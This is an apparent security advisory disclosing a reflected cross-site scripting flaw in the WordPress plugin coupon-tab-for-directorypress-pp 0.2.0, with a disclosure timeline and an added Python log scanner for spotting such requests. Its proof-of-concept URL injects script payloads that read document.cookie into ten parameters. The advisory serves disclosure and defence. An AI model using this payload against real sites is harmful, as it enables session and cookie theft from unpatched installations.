wp-plugin : coupon-tab-for-directorypress-pp

Plugin Details
Plugin Name: wp-plugin : coupon-tab-for-directorypress-pp
Affected Version : 0.2.0 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/coupon-tab-for-directorypress-pp/pp-coupon-popup.php?cfh=</style><script>alert(document.cookie)</script>&cc=cc'><script>alert(document.cookie)</script>&cb=cb'><script>alert(document.cookie)</script>&cfd=cfd&ce=ce'><script>alert(document.cookie)</script>&cd=cd'><script>alert(document.cookie)</script>&cdt=cdt'><script>alert(document.cookie)</script>&cdet=cdet'><script>alert(document.cookie)</script>&cs=cs'><script>alert(document.cookie)</script>&cfw=cfw'></style><script>alert(document.cookie)</script>&surl=surl'><script>alert(document.cookie)</script>&

 

Vulnerable Parameters : cfh, cc, cb, cd, ce, cdt, cdet, cs, cfw, surl

Type of XSS : Reflected
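
To check whether a site has received requests of this shape, the access log can be searched for the endpoint and parameters listed above. The following is an added example, not part of the original advisory or the plugin's code; the common/combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint and parameter names come from the advisory above.
ENDPOINT = "/wp-content/plugins/coupon-tab-for-directorypress-pp/pp-coupon-popup.php"
PARAMS = {"cfh", "cc", "cb", "cd", "ce", "cdt", "cdet", "cs", "cfw", "surl"}

# HTML metacharacters; a coupon value containing an apostrophe also matches,
# so treat hits as leads to review rather than confirmed attacks.
MARKUP = re.compile(r"[<>\"']")
# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(log_line):
    """Return the advisory parameters whose decoded value contains markup."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith(ENDPOINT):
        return []
    hits = set()
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        # parse_qsl removes one layer of percent-encoding; unquote once more
        # so double-encoded values (%253C) are seen as well.
        if name in PARAMS and MARKUP.search(unquote(value)):
            hits.add(name)
    return sorted(hits)


# Constructed sample log lines (documentation IP range, not real traffic).
PREFIX = '203.0.113.5 - - [07/Jul/2014:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    PREFIX + ENDPOINT + "?cfh=%3C%2Fstyle%3E%3Cscript%3Ealert(document.cookie)"
    '%3C%2Fscript%3E&cc=SAVE10 HTTP/1.1" 200 512',
    PREFIX + ENDPOINT + '?cc=SAVE10&cb=shop&surl=http://example.com/deal HTTP/1.1" 200 498',
    PREFIX + ENDPOINT + '?cs=cs%2527%253E&cd=ok HTTP/1.1" 200 501',
    PREFIX + '/index.php?s=%3Cb%3E HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line), line[len(PREFIX):len(PREFIX) + 70])
```
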


Disclosure Timeline
Vendor Contacted : 2014-01-04
Plugin Status : Updated on
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
Coupon Tab (pp-coupon-tab) creates a new tab on the directory listing page of Directory Press. This tab is titled "Coupon" and displays the coupons listed by the registered users. This plugin requires DirectoryPress and has been tested till version 7.1.3 with a slight modification. Please check installation notes for details.